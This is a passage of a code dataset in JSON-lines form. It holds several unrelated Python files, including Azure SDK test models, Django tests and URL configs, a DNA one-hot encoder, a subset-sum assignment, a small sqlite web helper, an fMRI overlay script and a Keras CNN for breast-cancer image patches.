30)\n\n\nclass ParameterGroupingPostMultiParamGroupsSecondParamGroup(Model):\n \"\"\"Additional parameters for post_multi_param_groups operation.\n\n :param header_two:\n :type header_two: str\n :param query_two: Query parameter with default. Default value: 30 .\n :type query_two: int\n \"\"\"\n\n _attribute_map = {\n 'header_two': {'key': '', 'type': 'str'},\n 'query_two': {'key': '', 'type': 'int'},\n }\n\n def __init__(self, **kwargs):\n super(ParameterGroupingPostMultiParamGroupsSecondParamGroup, self).__init__(**kwargs)\n self.header_two = kwargs.get('header_two', None)\n self.query_two = kwargs.get('query_two', 30)\n\n\nclass ParameterGroupingPostOptionalParameters(Model):\n \"\"\"Additional parameters for post_optional operation.\n\n :param custom_header:\n :type custom_header: str\n :param query: Query parameter with default. Default value: 30 .\n :type query: int\n \"\"\"\n\n _attribute_map = {\n 'custom_header': {'key': '', 'type': 'str'},\n 'query': {'key': '', 'type': 'int'},\n }\n\n def __init__(self, **kwargs):\n super(ParameterGroupingPostOptionalParameters, self).__init__(**kwargs)\n self.custom_header = kwargs.get('custom_header', None)\n self.query = kwargs.get('query', 30)\n\n\nclass ParameterGroupingPostRequiredParameters(Model):\n \"\"\"Additional parameters for post_required operation.\n\n All required parameters must be populated in order to send to Azure.\n\n :param body: Required.\n :type body: int\n :param custom_header:\n :type custom_header: str\n :param query: Query parameter with default. Default value: 30 .\n :type query: int\n :param path: Required. Path parameter\n :type path: str\n \"\"\"\n\n _validation = {\n 'body': {'required': True},\n 'path': {'required': True},\n }\n\n _attribute_map = {\n 'body': {'key': '', 'type': 'int'},\n 'custom_header': {'key': '', 'type': 'str'},\n 'query': {'key': '', 'type': 'int'},\n 'path': {'key': '', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(ParameterGroupingPostRequiredParameters, self).__init__(**kwargs)\n self.body = kwargs.get('body', None)\n self.custom_header = kwargs.get('custom_header', None)\n self.query = kwargs.get('query', 30)\n self.path = kwargs.get('path', None)\n","sub_path":"test/azure/Expected/AcceptanceTests/AzureParameterGrouping/azureparametergrouping/models/_models.py","file_name":"_models.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"327350700","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/eliotberriot/Seafile/kii/kii_main/kii/stream/tests/test_discussion.py\n# Compiled at: 2015-01-18 07:28:37\nfrom django.core.urlresolvers import reverse\nfrom actstream import models as actstream_models\nimport json\nfrom kii.discussion.models import AnonymousCommenterProfile\nfrom . import base\nfrom .. import models\n\nclass TestDiscussion(base.StreamTestCase):\n\n def test_can_attach_comments_to_stream_items(self):\n si = models.StreamItem(root=self.streams[0], title='test', status='published')\n si.save()\n c = models.ItemComment(subject=si, user=self.users[1], content='Hello world')\n c.save()\n self.assertEqual(si.comments.all().first(), c)\n\n def test_can_post_comment_as_logged_in_user(self):\n self.streams[0].assign_perm('read', self.anonymous_user)\n si = models.StreamItem(root=self.streams[0], title='test', status='published')\n si.save()\n url = si.reverse_comment_create()\n self.login(self.users[0].username)\n response = self.client.post(url, {'content': 'yolo'})\n self.assertEqual(si.comments.all().first().content.raw, 'yolo')\n\n def test_can_post_comment_as_anonymous_user(self):\n self.streams[0].assign_perm('read', self.anonymous_user)\n si = models.StreamItem(root=self.streams[0], title='test', status='published')\n si.save()\n url = si.reverse_comment_create()\n response = self.client.post(url, {'username': 'Edgar', 'email': 'contact@edgar.com', 'content': 'yolo'})\n comment = si.comments.all().first()\n self.assertEqual(comment.profile.username, 'Edgar')\n self.assertEqual(comment.profile.email, 'contact@edgar.com')\n\n def test_moderation_page_require_to_be_stream_owner(self):\n s = models.Stream.objects.get(title=self.users[0].username, owner=self.users[0])\n url = reverse('kii:stream:stream:itemcomment:moderation', kwargs={'stream': s.slug})\n response = self.client.get(url)\n self.assertRedirectsLogin(response, url)\n self.login(self.users[0].username)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n def test_moderation_return_awaiting_moderation_comments_by_default(self):\n s = models.Stream.objects.get(title=self.users[1].username, owner=self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n si1 = self.G(models.StreamItem)\n profile = self.G(AnonymousCommenterProfile)\n c0 = self.G(models.ItemComment, subject=si0, user_profile=profile)\n c1 = self.G(models.ItemComment, subject=si0, user_profile=profile)\n c2 = self.G(models.ItemComment, subject=si1, user_profile=profile)\n c3 = self.G(models.ItemComment, subject=si1, user_profile=profile)\n url = reverse('kii:stream:stream:itemcomment:moderation', kwargs={'stream': s.slug})\n self.login(self.users[1].username)\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n self.assertQuerysetEqualIterable(response.context['object_list'], [c1, c0])\n self.assertEqual(response.context['can_moderate'], True)\n\n def test_moderation_can_filter_by_status(self):\n s = models.Stream.objects.get(title=self.users[1].username, owner=self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n si1 = self.G(models.StreamItem)\n profile = self.G(AnonymousCommenterProfile)\n c0 = self.G(models.ItemComment, subject=si0, user_profile=profile, status='junk')\n c1 = self.G(models.ItemComment, subject=si0, user_profile=profile)\n url = reverse('kii:stream:stream:itemcomment:moderation', kwargs={'stream': s.slug})\n self.login(self.users[1].username)\n response = self.client.get(url + '?status=junk')\n self.assertQuerysetEqualIterable(response.context['object_list'], [c0])\n\n def test_patch_comment_view_require_stream_owner(self):\n s = models.Stream.objects.get(title=self.users[1].username, owner=self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n c0 = self.G(models.ItemComment, subject=si0, user=self.users[0], content='Hello')\n url = reverse('kii:api:stream:itemcomment:update', kwargs={'pk': c0.pk})\n response = self.client.patch(url)\n self.assertEqual(response.status_code, 403)\n self.login(self.users[1].username)\n response = self.client.patch(url, json.dumps({'status': 'disapproved'}), content_type='application/json')\n self.assertEqual(response.status_code, 200)\n c = models.ItemComment.objects.get(pk=c0.pk)\n self.assertEqual(c.status, 'disapproved')\n\n def test_addding_comment_send_notificatation_to_stream_owner(self):\n s = models.Stream.objects.get_user_stream(self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n c = self.G(models.ItemComment, subject=si0, user=self.users[0])\n activity = actstream_models.user_stream(self.users[1])\n self.assertEqual(activity[0].action_object, c)\n self.assertEqual(activity[0].target, s)\n\n def test_each_comment_gets_an_absolute_url(self):\n s = models.Stream.objects.get_user_stream(self.users[1])\n si0 = self.G(models.StreamItem, root=s)\n c = self.G(models.ItemComment, subject=si0, user=self.users[0])\n self.assertEqual(c.get_absolute_url(), si0.get_absolute_url() + ('#comment-{0}').format(c.pk))","sub_path":"pycfiles/kii-0.8.tar/test_discussion.py","file_name":"test_discussion.py","file_ext":"py","file_size_in_byte":5556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"470251669","text":"import numpy as np\nimport os\nimport csv\nimport sys\nimport skbio\nimport pickle\nimport random\n\ndef read_fasta(fp):\n name, seq = None, []\n for line in fp:\n #remove first line from file\n line = line.rstrip()\n if line.startswith(\">\"):\n #create a string\n if name: yield (name, ''.join(seq))\n name, seq = line, []\n else:\n seq.append(line)\n if name: yield (name, ''.join(seq))\n\ndef vectorizeSequence(seq):\n # the order of the letters is not arbitrary.\n # Flip the matrix up-down and left-right for reverse compliment\n ltrdict = {'A':[1,0,0,0],'C':[0,1,0,0],'G':[0,0,1,0],'T':[0,0,0,1],\n 'a':[1,0,0,0],'c':[0,1,0,0],'g':[0,0,1,0],'t':[0,0,0,1]}\n return np.array([ltrdict[x] for x in seq])\n #return [[ltrdict[x] for x in seq]]\n#directory = os.getcwd()\n#directory = os.fsencode(directory1)\ndirectory = os.path.dirname(os.path.realpath(__file__))\ndata_directory = directory + \"/fna_files_two/\"\npickle_directory = directory + \"/pickle_files/\"\ndata_directory_encode = os.fsencode(data_directory)\ncounter = 0\ndataset = []\nlabels = []\nfor file in os.listdir(data_directory_encode):\n filename = os.fsdecode(file)\n if filename.endswith(\".fna\"):\n label = list(skbio.io.read(data_directory + filename,\n format = 'fasta'))[0].metadata['id']\n labels.append(label)\n data_filename = data_directory + filename\n with open(data_filename) as fp:\n for name, seq in read_fasta(fp):\n i = 0\n one_hot_seq = vectorizeSequence(seq)\n #length of the DNA sample\n seqLength = len(one_hot_seq)\n #list to store the 10000 150x4 training examples\n training_examples = []\n \n for i in range(0,10000):\n \n #generates 150 random integers to parse the DNA sample\n indices = np.random.randint(seqLength,size = 150)\n \n \t #a single 150x4 random example\n example = one_hot_seq[indices,:]\n tuple1 = (example, counter)\n #append each tuple of one bacteria(150x4) and it's label\n training_examples.append(tuple1)\n \n #create an array with 10K elements for 10K rows\n #training_examples = np.asarray(training_examples)\n \n counter +=1\n #print(training_examples)\n random_indices = np.random.randint(10000, size = 10000)\n for m in range(10000):\n dataset.append(training_examples[random_indices[m]])\n else:\n continue\nprint(dataset)\nfile1 = open(pickle_directory + 'dataset.pickle', 'wb')\npickle.dump(dataset,file1)\nfile1.close()\n\n","sub_path":"MetaGAN/Genomes/one_hot.py","file_name":"one_hot.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"243518150","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('alert', '0004_auto_20170511_1502'),\n ]\n\n operations = [\n migrations.AlterModelOptions(\n name='message',\n options={'ordering': ['-pk']},\n ),\n migrations.AddField(\n model_name='subscriber',\n name='slack_username',\n field=models.CharField(max_length=100, null=True, blank=True),\n ),\n ]\n","sub_path":"alert/migrations/0005_auto_20170804_0723.py","file_name":"0005_auto_20170804_0723.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"614878538","text":"import numpy as np\nimport math\nimport xml.etree.ElementTree as ET\nfrom typing import List, Tuple\n\n\ndef getKnownCalibrationFormats() -> Tuple[List, List]:\n \"\"\"Return list of supported calibration formats and their extensions\n\n Returns\n -------\n extensions : List\n List of calibration file extensions\n formats : List\n List of calibration file formats \n \"\"\"\n calExt = [\"TXT\", \"TXT\", \"RSP\", \"RSPX\"]\n calFormats = [\"induction\", \"metronix\", \"rsp\", \"rspx\"]\n return calExt, calFormats\n\n\ndef getCalName(format, ext: str, sensor: str, serial: int, chopper) -> str:\n \"\"\"Get the calibration file name\n \n Parameters\n ----------\n format : str\n Calibration format\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : str\n Name of calibration file\n \"\"\"\n if format == \"induction\":\n return inductionName(ext, sensor, serial, chopper)\n elif format == \"metronix\":\n return metronixName(ext, sensor, serial, chopper)\n elif format == \"rsp\":\n return rspName(ext, sensor, serial, chopper)\n elif format == \"rspx\":\n return rspxName(ext, sensor, serial, chopper)\n else:\n return metronixName(ext, sensor, serial, chopper)\n\n\ndef inductionName(ext: str, sensor: str, serial: int, chopper: bool) -> str:\n \"\"\"Get internal format induction coil calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : str\n Name of calibration file\n \"\"\"\n return \"IC_{}.{}\".format(serial, ext)\n\n\ndef metronixName(ext: str, sensor: str, serial: int, chopper: bool) -> str:\n \"\"\"Get Metronix calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : str\n Name of calibration file\n \"\"\"\n if sensor == \"\" and not serial > 0:\n return None\n\n return \"{}{}.{}\".format(sensor, serial, ext)\n\n\ndef rspName(ext: str, sensor: str, serial: int, chopper: bool) -> List[str]:\n \"\"\"Get RSP calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : List[str]\n Name of calibration files\n \"\"\"\n if len(sensor) < 5:\n # not possible to get a sensor number\n return None\n\n board = \"HF\"\n if chopper:\n board = \"LF\"\n # try to turn the sensor into an integer serial number\n try:\n sensorNum = int(sensor[3:])\n except:\n sensorNum = 0\n\n names = []\n names.append(\"TYPE-{:03d}_{}-ID-{:06d}.{}\".format(sensorNum, board, serial, ext))\n names.append(\"TYPE-{:03d}_BB-ID-{:06d}.{}\".format(sensorNum, serial, ext))\n return names\n\n\ndef rspxName(ext: str, sensor: str, serial: int, chopper: bool) -> List[str]:\n \"\"\"Get RSPX calibration file name\n \n Parameters\n ----------\n ext : str\n Calibration file extension\n sensor : str\n Sensor name\n serial : int\n The sensor serial number\n chopper : bool\n Boolean flag for chopper on or off\n\n Returns\n -------\n out : List[str]\n Name of calibration files\n \"\"\"\n if len(sensor) < 6:\n # not possible to get a sensor number\n return None\n\n board = \"HF\"\n if chopper:\n board = \"LF\"\n sensorNum = int(sensor[3:5])\n names = []\n names.append(\"TYPE-{:03d}_{}-ID-{:06d}.{}\".format(sensorNum, board, serial, ext))\n names.append(\"TYPE-{:03d}_BB-ID-{:06d}.{}\".format(sensorNum, serial, ext))\n return names\n\n\ndef defaultCalibration():\n \"\"\"Default calibration data\n\n Returns\n -------\n data : np.ndarray\n Data lines converted to a float array\n staticGain : float\n Static gain \n \"\"\"\n return [1] * 10, 1\n","sub_path":"resistics/calibrate/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"166032570","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n'''\nAssignment 1: Birthday Present\n\nTeam Number: 2\nStudent Names: Amanda Forsman, Jessica Hillert\n'''\nimport unittest\n\ndef birthday_present(P, n, t):\n '''\n Sig: int[0..n-1], int, int --> Boolean\n Pre: n is the length of P and t is not a negative value\n Post: The returnvalue will be true if there is a match and otherwise false\n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present(P, len(P), 299) = True\n birthday_present(P, len(P), 11) = False\n '''\n # Initialize the dynamic programming matrix, A\n # Type: Boolean[0..n][0..t]\n # A = [[None for i in range(t + 1)] for j in range(n + 1)] ??\n out = []\n return_value = birthday_present_aux(P, n, t, P, out)\n return return_value\n\ndef birthday_present_aux(p, n, t, in_list, out_list):\n '''\n Sig: int[0..n-1], int, int --> Boolean\n Pre: n is the length of P and t is not a negative value\n Post: The returnvalue will be true if there is a match and otherwise false\n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present_aux(P, len(P), P, [], 299) = True\n birthday_present_aux(P, len(P), P, [], 11) = False\n '''\n if t == 0:\n return True\n elif t > 0:\n i = 0\n x = len(in_list)\n while i < x:\n new_in = list(in_list)\n new_out = list(out_list)\n new_t = t - in_list[i]\n new_out.append(new_in[i])\n new_in.remove(new_in[i])\n return_value = birthday_present_aux(p, len(in_list), new_t, new_in, new_out)\n if return_value == True:\n return True\n else:\n i += 1\n if len(in_list) == 0:\n i = x\n return False\n\ndef birthday_present_subset(P, n, t):\n '''\n Sig: int[0..n-1], int, int --> int[0..m]\n Pre: n is the length of P and t is not a negative value\n Post: It will return a list whose sum of the elements in it is equal to t \n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present_subset(P, len(P), 299) = [56, 7, 234, 2]\n birthday_present_subset(P, len(P), 11) = []\n '''\n out = []\n return_value = birthday_present_subset_aux(P, n, t, P, out)\n return return_value\n\ndef birthday_present_subset_aux(p, n, t, in_list, out_list):\n '''\n Sig: int[0..n-1], int, int --> int[0..m]\n Pre: n is the length of P and t is not a negative value\n Post: It will return a list whose sum of the elements in it is equal to t \n Example: P = [2, 32, 234, 35, 12332, 1, 7, 56]\n birthday_present_subset_aux(P, len(P), 299) = [56, 7, 234, 2]\n birthday_present_subset_aux(P, len(P), 11) = []\n '''\n if t == 0:\n return out_list\n elif t > 0:\n i = 0\n x = len(in_list)\n while i < x:\n new_in = list(in_list)\n new_out = list(out_list)\n new_t = t - in_list[i]\n new_out.append(new_in[i])\n new_in.remove(new_in[i])\n return_value = birthday_present_subset_aux(p, len(in_list), new_t, new_in, new_out)\n if len(return_value) > 0:\n return return_value\n else:\n i += 1\n if len(in_list) == 0:\n i = x\n return []\n\nclass BirthdayPresentTest(unittest.TestCase):\n \"\"\"Test Suite for birthday present problem\n \n Any method named \"test_something\" will be run when this file is \n executed. Use the sanity check as a template for adding your own \n tests if you wish. \n (You may delete this class from your submitted solution.)\n \"\"\"\n \n def test_sat_sanity(self):\n \"\"\"Sanity Test for birthday_present()\n \n This is a simple sanity check;\n passing is not a guarantee of correctness.\n \"\"\"\n P = [2, 32, 234, 35, 12332, 1, 7, 56]\n n = len(P)\n t = 11\n self.assertFalse(birthday_present(P, n, t))\n def test_sol_sanity(self):\n \"\"\"Sanity Test for birthday_present_subset()\n \n This is a simple sanity check;\n passing is not a guarantee of correctness.\n \"\"\"\n P = [2, 32, 234, 35, 12332, 1, 7, 56]\n n = len(P)\n t = 299\n self.assertTrue(birthday_present(P, n, t))\n self.assertItemsEqual(birthday_present_subset(P, n, t), \n [56, 7, 234, 2])\n\n \nif __name__ == '__main__':\n unittest.main()\n","sub_path":"birthday_problem.py","file_name":"birthday_problem.py","file_ext":"py","file_size_in_byte":4513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"247917363","text":"import pickle\n#test\nfrom customobj import customobj_inh\nimport urllib\nfrom http.server import HTTPServer, CGIHTTPRequestHandler\nimport yate\n\nimport sqlite3\n\ndb_name = 'cgi-bin/coachdata.sqlite'\n\ndef do_web_process():\n #test functions for yate.py\n print(yate.start_response())\n print(yate.start_response(\"text/plain\"))\n print(yate.start_response(\"application/json\"))\n print(yate.include_header(\"Test title for my web application in python test\"))\n print(yate.include_footer({'Home':'/index.html', 'Select':'/cgi-bin/select.py'}))\n print(yate.start_form(\"/cgi-bin/process-athlete.py\"))\n #print(urllib.request.urlopen('http://192.168.0.1/test.py', urllib.parse.urlencode({'a':'c'})))\n print(urllib.parse.urlencode({'a':'c'}))\n \n the_files = ['testdata/sarah2.txt', 'testdata/james2.txt', 'testdata/mikey2.txt']\n data = put_to_store(the_files)\n for each_data in data:\n print(data[each_data].name+' '+data[each_data].dob)\n data_copy = get_from_store()\n for each_data in data_copy:\n print(data_copy[each_data].name+' '+data_copy[each_data].dob)\n #start simple http server for test\n simple_http_server_test()\n pass\n\ndef simple_http_server_test():\n port = 8080\n\n httpd = HTTPServer(('', port), CGIHTTPRequestHandler)\n print(\"Starting simple_httpd on port: \" + str(httpd.server_port))\n httpd.serve_forever()\n\ndef process_files_obj(f_name):\n try:\n with open(f_name) as tFile:\n data = tFile.readline()\n tmp_list = data.strip().split(',')\n return(customobj_inh(tmp_list.pop(0), tmp_list.pop(0), tmp_list))\n except IOError as err:\n print('File error: '+str(err))\n return(None)\n\ndef put_to_store(files_list):\n all_referenses = {}\n \n for each_file in files_list:\n a_file = process_files_obj(each_file)\n all_referenses[a_file.name]=a_file\n try:\n with open('testdata/athletes.pickle', 'wb') as a_file_p:\n pickle.dump(all_referenses, a_file_p)\n except IOError as ioerr:\n print('File error(put_to_store): '+str(ioerr))\n \n return (all_referenses)\n pass\ndef get_from_store():\n all_referenses = {}\n try:\n with open('testdata/athletes.pickle', 'rb') as a_file_p:\n all_referenses = pickle.load(a_file_p)\n except IOError as ioerr:\n print('File error(get_from_store): '+str(ioerr))\n\n return (all_referenses)\n\ndef get_namesID_from_store():\n connection = sqlite3.connect(db_name)\n cursor = connection.cursor()\n results = cursor.execute(\"\"\"SELECT name, id FROM athletes\"\"\")\n response = results.fetchall()\n connection.close()\n return(response)\ndef get_athlete_from_id(athlete_id):\n connection = sqlite3.connect(db_name)\n cursor = connection.cursor()\n results = cursor.execute(\"\"\"SELECT name, dob FROM athletes WHERE id=?\"\"\",(athlete_id,))\n (name, dob) = results.fetchone()\n results = cursor.execute(\"\"\"SELECT value FROM timing_data WHERE athlete_id=?\"\"\",(athlete_id,))\n data = [row[0] for row in results.fetchall()]\n \n #Due to unknown order inside database, so we need sorted the data via customobj_inh class before display\n m_tmp_item = customobj_inh(name, dob, data)\n response = {'Name': m_tmp_item.name,\n 'DOB': m_tmp_item.dob,\n 'data': m_tmp_item.clean_data,\n 'top3': m_tmp_item.top3()}\n connection.close()\n return(response)\ndef get_name_from_store():\n connection = sqlite3.connect(db_name)\n cursor = connection.cursor()\n results = cursor.execute(\"\"\"SELECT name FROM athletes\"\"\")\n response = [row[0] for row in results.fetchall()]\n connection.close()\n return(response)\n'''\n m_item = get_from_store()\n list_trsult = [m_item[each_item].name for each_item in m_item]\n return(list_trsult)\n'''\n ","sub_path":"test/webprocess.py","file_name":"webprocess.py","file_ext":"py","file_size_in_byte":3842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"3797020","text":"from django.conf.urls import patterns, include, url\n\nfrom example.profiles.views import *\n\n\nurlpatterns = patterns('',\n url(r'^profile/(?P[a-z0-9-_]+).html$', AuthorDetailView.as_view(), name='author_detail'),\n url(r'^authors.html$', AuthorListView.as_view(), name='author_browse'),\n url(r'^account/users.html$', ProfileListView.as_view(), name='profile_list'),\n url(r'^account/user/create.html$', ProfileCreateView.as_view(), name='profile_create'),\n url(r'^account/user/(?P\\d+)/update.html$', ProfileUpdateView.as_view(), name='profile_update'),\n url(r'^account/user/(?P\\d+)/delete.html$', ProfileDeleteView.as_view(), name='profile_delete'),\n url(r'^account/settings_change.html$', ProfileSettingsUpdateView.as_view(), name='profile_settings'),\n url(r'^account/avatar_change.html$', AvatarChangeView.as_view(), name='avatar_change'),\n url(r'^render_primary/(?P[\\w\\d\\.\\-_]{3,30})/(?P[\\d]+)/$', 'render_primary', name='avatar_render_primary'),\n url(r'^list/(?P[\\+\\w\\@\\.]+)/$', 'avatar_gallery', name='avatar_gallery'),\n url(r'^list/(?P[\\+\\w\\@\\.]+)/(?P[\\d]+)/$', 'avatar', name='avatar'),\n)\n","sub_path":"example/profiles/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"25909076","text":"#overall plots\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport nibabel as nib\nimport os\nimport sys\nfrom sklearn.cluster import AgglomerativeClustering\nfrom sklearn.feature_extraction.image import grid_to_graph\nimport pandas as pd\nfrom scipy.stats import t as t_dist\n\nproject_path = \"../../\"\npath_to_data = project_path+\"data/ds009/\"\nlocation_of_images = project_path+\"images/\"\nlocation_of_functions = project_path+\"code/utils/functions/\" \nfinal_data = \"../data/\"\nbehav_suffix = \"/behav/task001_run001/behavdata.txt\"\nsmooth_data = final_data + 'smooth/'\nhrf_data = final_data + 'hrf/'\n\nsys.path.append(location_of_functions)\n\n# list of subjects\nsub_list = os.listdir(path_to_data)[1:]\n\n# Progress bar\ntoolbar_width=len(sub_list)\nsys.stdout.write(\"Clustering images: \")\nsys.stdout.write(\"[%s]\" % (\" \" * toolbar_width))\nsys.stdout.flush()\nsys.stdout.write(\"\\b\" * (toolbar_width+1))\n\nfrom tgrouping import t_grouping_neighbor\nfrom mask_phase_2_dimension_change import masking_reshape_start, masking_reshape_end, neighbor_smoothing, neighbor_smoothing_binary\nfrom Image_Visualizing import present_3d, make_mask\nfrom benjamini_hochberg import bh_procedure\n\n\n\n\nbh_all = np.load(\"../data/bh_t_beta/bh_all.npy\")\nt_all = np.load(\"../data/bh_t_beta/t_all.npy\")\nbeta_all = np.load(\"../data/bh_t_beta/beta_all.npy\")\n\n\nbh_all[bh_all!=1]=np.nan\nt_all[t_all!=1]=np.nan\nbeta_all[beta_all!=1]=np.nan\n\n\nfor i, name in enumerate(sub_list):\n\n\t# the mask for each subject\n\tpath_to_data = project_path + \"data/ds009/\" + name\n\tbrain = nib.load(path_to_data + '/anatomy/inplane001_brain.nii.gz')\n\tbrain=brain.get_data()\n\n\n\t# bh\n\tplt.imshow(present_3d(brain[::2,::2,:]),cmap=\"gray\")\n\n\tupper= np.percentile(np.ravel(brain[::2,::2,:]),95)\n\tplt.colorbar()\n\t#plt.clim(0,upper)\n\toverlap=present_3d(bh_all[...,i])\n\toverlap[overlap==0]=np.nan\n\toverlap[-1,-1]=0 # to make the output correct\n\tplt.imshow(overlap,cmap=\"Blues\",alpha=.5)\n\tplt.savefig(\"../../images/\"+name+\"_bh_overlay.png\")\n\tplt.close()\n\n\n\t# t\n\tplt.imshow(present_3d(brain[::2,::2,:]),cmap=\"gray\")\n\n\tplt.colorbar()\n\toverlap=present_3d(t_all[...,i])\n\toverlap[overlap==0]=np.nan\n\toverlap[-1,-1]=0 # to make the output color correct\n\n\tplt.imshow(overlap,cmap=\"Blues\",alpha=.5)\n\tplt.savefig(\"../../images/\"+name+\"_t_overlay.png\")\n\tplt.close()\n\n\n\n\t# beta\n\tplt.imshow(present_3d(brain[::2,::2,:]),cmap=\"gray\")\n\n\tplt.colorbar()\n\toverlap=present_3d(beta_all[...,i])\n\toverlap[overlap==0]=np.nan\n\toverlap[-1,-1]=0 # to make the output color correct\n\n\tplt.imshow(overlap,cmap=\"Blues\",alpha=.5)\n\tplt.savefig(\"../../images/\"+name+\"_beta_overlay.png\")\n\tplt.close()\n\n\tsys.stdout.write(\"-\")\n\tsys.stdout.flush()\n\nsys.stdout.write(\"\\n\")\n\n\n","sub_path":"final/scripts/image_overlay_final.py","file_name":"image_overlay_final.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"35820061","text":"# neccesary libraries\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.applications.vgg16 import VGG16\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Conv2D, Input\nfrom keras.layers import (Dense, Dropout,concatenate, Activation, Flatten, BatchNormalization, Conv2D, MaxPool2D, MaxPooling2D,Input,GlobalAveragePooling2D,\nGlobalMaxPooling2D,ZeroPadding2D,AveragePooling2D,Reshape,Convolution2D)\nfrom keras.utils.np_utils import to_categorical\nfrom keras.callbacks import Callback, EarlyStopping, ReduceLROnPlateau, ModelCheckpoint, TensorBoard\nfrom keras.utils import layer_utils\nfrom keras.optimizers import SGD\nfrom keras.callbacks import EarlyStopping\nfrom keras.utils.vis_utils import plot_model\n\nfrom sklearn.utils import class_weight\nfrom sklearn import model_selection\n\nfrom glob import glob\nfrom shutil import copyfile\nimport pandas as pd\nfrom os import listdir\nimport fnmatch\nimport numpy as np\nimport random\nimport cv2\n\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\nfrom sklearn.utils import class_weight\nfrom PIL import Image\nfrom pandas import DataFrame\n\nfrom time import time\n\n# read data\ndata=pd.read_pickle(\"./balancedData_shuffled\")\n\n## get image data from dataframe\ndef procData(lower_ind, upper_ind):\n x = []\n y = []\n for ind in range(lower_ind, upper_ind):\n path = data['path'][ind]\n label = data['label'][ind]\n image = data['matrix'][ind]\n shape = image.shape\n if shape == (50,50,3):\n x.append(image)\n if label == '1':\n y.append(1)\n else:\n y.append(0)\n return x, y\n\n## Read images for debugging\nimport math\ntotal = data.shape[0]\ntest_part = math.ceil(total / 5)\ntrain_part = total - test_part\n\nX,Y = procData(0, train_part)\ntest_X, test_Y = procData(train_part, total)\n\nprint(\"idc(+) :\", Y.count(1))\nprint(\"idc(-) :\", Y.count(0))\nprint(\"Testing size :\", len(test_Y))\nprint(\"Training data shape :\", X[0].shape)\ndf = pd.DataFrame()\ndf[\"images\"]=X\ndf[\"labels\"]=Y\nX2 = df[\"images\"]\nY2 = df[\"labels\"]\nX = np.array(X)\nY = np.array(Y)\n\ntest_X = np.array(test_X)\ntest_Y = np.array(test_Y)\n\ntrain_X = X/255.0 # scale to [0,1]\ntest_X = test_X/255.0 # scale to [0,1]\n\ntrainHot_Y = to_categorical(Y, num_classes = 2)\ntestHot_Y = to_categorical(test_Y, num_classes = 2)\n\nprint(\"vgg16 executing \" )\ndef vgg_like(train_X, trainHot_Y, test_X, testHot_Y):\n \n input_shape = (50,50,3)\n model = Sequential()\n model.add(Conv2D(64, kernel_size=(3, 3),activation='relu',input_shape=input_shape,strides=2))\n model.add(Conv2D(64, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Conv2D(128, (3, 3), activation='relu'))\n model.add(Conv2D(256, (3, 3), activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n model.add(Dropout(0.5))\n model.add(Flatten())\n model.add(Dense(512, activation='relu'))\n model.add(Dropout(0.5))\n model.add(Dense(2, activation='softmax'))\n \n model.compile(loss=keras.losses.binary_crossentropy,optimizer=keras.optimizers.Adadelta(lr=1),metrics=['accuracy'])\n \n es= EarlyStopping(monitor='val_loss', min_delta=0.05, patience=30, verbose=0, mode='auto')\n hist = model.fit(train_X,trainHot_Y, batch_size=64, epochs=50, callbacks = [es], validation_split =0.2)\n\n test_loss,test_acc = model.evaluate(test_X, testHot_Y, batch_size=64)\n \n# print(hist.history)\n plt.ylim(0.5, 1)\n plt.plot(hist.history['acc'])\n plt.plot(hist.history['val_acc'])\n 